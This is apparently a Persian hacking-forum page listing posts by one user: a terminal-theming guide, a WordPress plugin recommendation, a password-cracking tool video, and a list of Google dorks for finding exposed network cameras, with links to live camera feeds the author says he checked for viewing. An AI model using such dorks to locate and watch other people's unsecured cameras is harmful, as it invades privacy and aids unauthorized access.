- آموزش برنامه نویسی
- آموزش برنامه نویسی تحت وب
- طراحی سایت
- آموزش زبان برنامه نویسی css
- اموزش طراحی سایت
- برنامه نویس
- برنامه نویسی
- program
- programming
- web
- programmer
- site
- mr.msa
- client side
- web site
- font
- آموزش زبان برنامه نویسی css - به همراه مثال
- font-size
- font-style
- font-family
- color
- width
- height
- background
- css
- source
- background-color
- background-size
-
با سلام خدمت دوستان عزیز گاردایران . من توی کانال های مختلف هک ، لینوکس ، برنامه نویسی .. هستم و بعضی ها رو می بینم که تم ترمینالشون رو عوض می کنن که خیلی جذابیت می ده به کار ما هکر ها . پس منم رفتم نحوه تغییر تم رو یاد گرفتم ، توی انجمن که گشتم چنین پستی نبود ، پس گفتم اموزشش رو بزارم . خب ابتدا دستورات زیر به ترتیب می زنید : > sudo apt install figlet > sudo apt install lolcat > sudo apt install gem > sudo apt install ruby Figlet : برای اینکه بتونیم یک متن رو به صورت بزرگ برای مثال Mr.MSA رو زمانی که ترمینال باز می شود نمایش دهیم از figlet استفاده می کنیم . که فونت های مختلف در اینجا موجود است. lolcat : برای اینکه به متن خودمون رو به صورت رندم رنگ هایی رو بدیم از lolcat استفاده می کنیم . Gem & Ruby : پیشنیاز های lolcat . حالا برای اینکه بتونیم از lolcat استفاده کنیم از این دستور استفاده می کنیم : gem install lolcat و برای اینکه سیستم ابزار ها رو بشناسه از این دستور استفاده کنید : sudo apt update ---------------------------------------------------------------------------------------------------------------- خب حالا شما با دستور زیر می تونید متن خودتون رو بصورت بنر و رنگ های رندم نمایش دهید : figlet MR.MSA | lolcat خب حالا می خواهیم برای همیشه زمانی که ترمینال رو باز می کنیم این متن رو نمایش بده . ابتدا oh my zsh رو نصب کنید : نصب با curl : sh -c "$(curl -fsSL [Hidden Content])" نصب با wget : sh -c "$(wget [Hidden Content] -O -)" نصب با github : [Hidden Content] نصب تم در zsh : بعد از نصب zsh شما ابتدا این دستور رو می زنید : cd ~ بعد این دستور برای ادیت کردن فایل .zshrc vim .zshrc در اون فایل دنبال این کلمه بگردید : ZSH_THEME="robbyrussell" اون کلمه ای که بین " است نام تم zsh هست که به صورت پیش فرض robbyrussell هست . برای تغییر دادنش شما باید به این ادرس بروید : [Hidden Content] و بر اساس عکس هایی که گذاشته شده نام تم رو انتخاب کنید و در این قسمت قرار دهید : ZSH_THEME=" نام تم مورد نظر " نمایش بنر دلخواه با رنگ رندم : برای اینکار در همان فایل .zshrc در خط اخر این دستور رو بزاید : figlet 'Mr.MSa' | lolcat و به جای Mr.MSA متن مورد نظر خودتون رو بنویسید . حالا این کلید ها رو به ترتیب روی کیبورد برای خارج شدن از ادیتور vim و سیو کردنش فشار دهید : 1) esc 2) : 3) w 4) q حالا در قسمت edit profile ترمینال در قسمت کامند شل پیش فرض که bash هست رو به zsh تغییر بدید یعنی : /bin/bash به این تغییر می کنه : /bin/zsh حالا یک بار از ترمینال خارج بشید و دوباره ترمینال رو باز کنید و مشاهده می کنید که ترمینال شما نسبت به روز اول زیبا تر شده است . و می توانید با دستورات zsh چیز های دیگه هم بزارید یا حتی همین دستور رو چند بار دیگه بنویسید با متن های مختلف . این یه فایل PDF آموزشی است که دوست عزیز دیفیسرمون HCSH4C39 نوشته که می تونید به همراه این تاپیک از این آموزش هم استفاده کنید : HCSH4C39.pdf موفق و پیروز باشید .
- 1 پاسخ
-
- زیبا سازی ترمینال
- پاروت
-
(و 32 مورد دیگر)
برچسب زده شده با :
- زیبا سازی ترمینال
- پاروت
- terminal theme
- mr.msa
- hacking
- edit theme
- hack
- ubuntu
- parrot
- kali
- linux
- debian
- terminal
- زیبا سازی ترمینال لینوکس .
- زیبا سازی لینوکس
- oh my zsh
- zsh
- lolcat
- ohmyzsh
- figlet
- ruby
- gem
- shell
- شل
- ابزار کالی لینوکس
- ابزار لینوکس
- زبان برنامه نویسی ruby
- کالی
- دبیان
- لینوکس
- مک
- ترمینال مک
- زیبا سازی ترمینال مک
- mac os x
-
با سلام خدمت کاربران و مدیران گارد ایران " پست رو پیشنهاد می کنم تا آخر بخوانید . " در این پست قصد دارم یک افزونه رو به شما معرفی کنم که در خیلی جاها مورد استفاده قرار می گیرد ، افزونه BigBlueButton (برای وردپرس ) که شما می توانید با استفاده از این افزونه، کلاس انلاین ، آموزش های آنلاین و ... برگذار کنید ؛ تقریبا نود درصد از امکانات یک کلاس آنلاین (اسکای روم و...) رو دارد و میزان عملکردش هم میشه گفت متوسطه رو به بالا هست و ترافیک خوبی دارد . بهتون پیشنهاد می کنم . این افزونه رایگان است و فقط کافی در وردپرس عبارت BigBlueButton رو جست و جو کنید و افزونه رو دانلود کنید . استفاده کردن ازش خیلی ساده هست و دو نوع دسترسی دارد : استاد و دانشجو ؛ اگر بخواهم ویژگی هاش رو بگم پست خیلی طولانی میشود خودتون بروید و ببینید . یک نکته در رابطه با ترافیک : چند روز پیش این افزونه رو برای یک دانشگاه گذاشتم که ۳ کلاس تقریبا ۲۰ نفره در یک ساعت داشت برگذار می شد و گزارش دادن که بعضی دانشجویان صفحه برایشان لود نمی شد و با فیلتر شکن وارد شدن این نکته رو گفتم که اگر یک نفر با این مشکل روبرو شد نگران نباشد . "امیدوارم لذت برده باشید و خوشتون اومده باشه ." bigbluebutton.zip
- 1 پاسخ
-
- آموزش آنلاین
- bigbluebutton
- (و 11 مورد دیگر)
-
با سلام خدمت دوستان سوالاتی که در رابطه با MSACMS هست رو در اینجا بپرسید . اگر کسی با MSACMS اشنایی ندارد این تاپیک رو تا اخر بخونه :
-
در این تاپیک دورک دوربین های مداربسه رو قرار دادم براتون و یه سری دوربین مداربسته که می توانید راحت تماشا کنید . inurl:"view.shtml" "Network Camera" "Camera Live Image" inurl:"guestimage.html" inurl:/ViewerFrame? intitle:"Network Camera NetworkCamera" intitle:NetworkCamera intext:"Pan / Tilt" inurl:ViewerFrame inurl:/live.htm intext:"M-JPEG"|"System Log"|"Camera-1"|"View Control" inurl:"MultiCameraFrame?Mode=Motion" intitle:"IP CAMERA Viewer" intext:"setting | Client setting" allintitle: Axis 2.10 OR 2.12 OR 2.30 OR 2.31 OR 2.32 OR 2.33 OR 2.34 OR 2.40 OR 2.42 OR 2.43 "Network Camera " Display Cameras intitle:"Express6 Live Image" intitle:"Orite IC301" camera linksys inurl:main.cgi دورک های زیادی در سایت های مختلف هست ولی این ها رو دونه دونه چک کردم تا بتوانید راحت تر استفاده کنید . این دوربین های مداربسته رو از همون دورک ها بدست اوردم و همین الان لینک ها چک شده . [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] "منبع : exploit-db.com " امیدوارم لذت برده باشید ، دونه دونه لینک چک کردن سخت هست تشکر فراموش نشه لطفا . 😄 موفق و پیروز باشید .
-
- mr.msa
- google hacking
-
(و 5 مورد دیگر)
برچسب زده شده با :
-
به دلایل امنیتی حذف شد.
-
با سلام خدمت کاربران و مدیران عزیز در این تاپیک برای شما یک ویدئو آماده کردم که ابزار john رو آموزش دادم . دو تا از حالت های پر کاربرد رو آموزش دادم امیدوارم اذت ببرید . از این ابزار می توانید برای گسترش پسورد لیست و کرک هش و ... استفاده کنید . امیدوارم لذت برده باشید و اگه لایک کنید ابزار های بیشتری رو قرار می دم . پیروز و سربلند باشید 😆.
-
- password attack
- password attacking
- (و 17 مورد دیگر)